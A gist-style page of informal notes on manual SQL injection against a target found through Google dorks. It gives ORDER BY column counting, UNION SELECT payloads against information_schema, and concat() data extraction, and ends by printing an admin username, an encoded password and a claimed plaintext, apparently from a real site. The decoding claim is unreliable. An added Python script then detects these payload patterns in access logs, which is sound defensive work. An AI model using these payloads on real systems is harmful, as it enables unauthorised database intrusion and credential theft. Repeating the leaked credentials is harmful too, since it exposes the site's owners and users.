ProgramFilesx86/6a6b7b55866b75ac8fa66de4e96f85a7
Created December 10, 2018 17:09
Mynoodmanualsqlinjec
1= check for the vulnerability (using Google dorks, of course)
so I found a target and I'll execute on it
we'll check it by adding 'or'
2= order injections {
+order+by+1
order by 1
+order+by+1--
} so we will add numbers from 1 to 100 to guess the number of columns
the error message will look like "Unknown number of columns" or something like this
so the error message showed up at number 7, so the number of columns is 6
3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') {
we'll inject these
union select 1,2,3,4,5,6
union all select 1,2,3,4,5,6
union select 1,2,3,4,5,6--
+union+select 1,2,3,4,5,6
+union+all+select 1,2,3,4,5,6
to show us the vulnerable columns
so you see the vulnerable columns are 4 & 6
we'll inject into them
so the purpose of this injection is to learn the names of the tables in the database
there's a table named 'users', in which we'll find the users' data
now to learn the data in this table we'll inject
follow me
}
4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data
we write concat(1st column , 2nd column , 3rd column)
so we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw=
the password is encoded with base64 (perhaps)
so the pwd is M*a!lu@5%k@p!L
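
Seen from the defending side, the four steps above leave a recognizable sequence in web server access logs. The following is an added example, not part of the original notes: it normalizes each query string and reports, per client, which of the stages it matched. The log format, IP addresses, paths and parameter names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Signatures for the payload shapes quoted in the notes above.
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "concat_extraction": re.compile(r"\bconcat\s*\([^)]*0x3a", re.I),
}

def normalize(query):
    """Decode %xx and '+', collapse whitespace: '+order+by+1' equals 'order by 1'."""
    return re.sub(r"\s+", " ", unquote_plus(query))

def analyze(log_lines, min_probes=3):
    """Return {client_ip: [stage, ...]} from constructed 'ip method url' lines."""
    probes = defaultdict(set)     # ip -> distinct ORDER BY indexes tried
    findings = defaultdict(list)  # ip -> stages in order of first sighting
    for line in log_lines:
        ip, _method, url = line.split(maxsplit=2)
        text = normalize(urlsplit(url).query)
        match = ORDER_BY.search(text)
        if match:
            probes[ip].add(int(match.group(1)))
        for stage, pattern in SIGNATURES.items():
            if pattern.search(text) and stage not in findings[ip]:
                findings[ip].append(stage)
    # One ORDER BY <n> is weak evidence; column counting walks through several n.
    for ip, indexes in probes.items():
        if len(indexes) >= min_probes:
            findings[ip].insert(0, "column_count_probe")
    return {ip: stages for ip, stages in findings.items() if stages}

# Constructed sample log: documentation IP ranges, hypothetical paths and parameters.
SAMPLE_LOG = [
    "203.0.113.7 GET /item.php?id=5+order+by+1--",
    "203.0.113.7 GET /item.php?id=5%20order%20by%206",
    "203.0.113.7 GET /item.php?id=5+order+by+7--",
    "203.0.113.7 GET /item.php?id=5+union+all+select+1,2,3,4,5,6",
    "203.0.113.7 GET /item.php?id=5+union+select+table_name+from+information_schema.tables",
    "203.0.113.7 GET /item.php?id=5+union+select+concat(1st,0x3a,2nd)",
    "198.51.100.20 GET /search.php?q=order+by+1+december",
]

if __name__ == "__main__":
    for ip, stages in analyze(SAMPLE_LOG).items():
        print(ip, stages)
```

The second client sends a single search that happens to contain "order by 1" and is not reported, because the default threshold requires three distinct ORDER BY indexes from one client.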